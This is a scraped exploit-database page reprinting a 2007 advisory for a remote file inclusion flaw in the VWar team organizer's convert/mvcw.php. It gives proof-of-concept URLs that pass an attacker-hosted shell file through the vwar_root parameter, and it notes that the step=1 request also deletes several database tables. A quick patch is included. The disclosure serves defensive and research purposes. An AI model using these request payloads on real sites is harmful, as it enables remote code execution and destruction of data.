Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
VWar - exploit.company
header-logo
Suggest Exploit
vendor:
VWar
by:
DNX
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: VWar
Affected Version From: v1.5.0 R15
Affected Version To: v1.5.0 R15
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion

The vulnerability exists in the $vwar_root parameter in convert/mvcw.php file, which allows remote attackers to include arbitrary files via a specially crafted request. This can lead to remote code execution.

Mitigation:

No update from vendor till now. A quick fix is to replace the code in convert/mvcw.php line 79 as mentioned in the text.
Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo--------------------
   | VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion |
   |                    coded by DNX                     |
   -------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.vwar.de
[!] Detected: 26.02.2007
[!] Reported: 27.02.2007
[!] Remote: yes

[!] Background: VWar is a team organizer based on PHP and MySQL

[!] Bug: $vwar_root in convert/mvcw.php

[!] PoC:
    - http://[site]/[path]/convert/mvcw.php?vwar_root=[xss]
    - http://[site]/[path]/convert/mvcw.php?step=1&vwar_root=[shell]

[!] Example:
    - http://127.0.0.1/vwar/convert/mvcw.php?step=1&vwar_root=http//127.0.0.1/shell.txt?

[!] Warning: "step=1" deletes all data from the tables vwar, vwar_opponents,
    vwar_scores and vwar_screen in the database

[!] Solution: No update from vendor till now

[!] Quick fix in convert/mvcw.php line 79:
    - replace:
	if ($GPC['step'] == 1)
	{
		// clean tables

    - with:
	if ($GPC['step'] == 1)
	{
		$vwar_root = "./../";
		// clean tables

# milw0rm.com [2007-08-28]
cqrsecured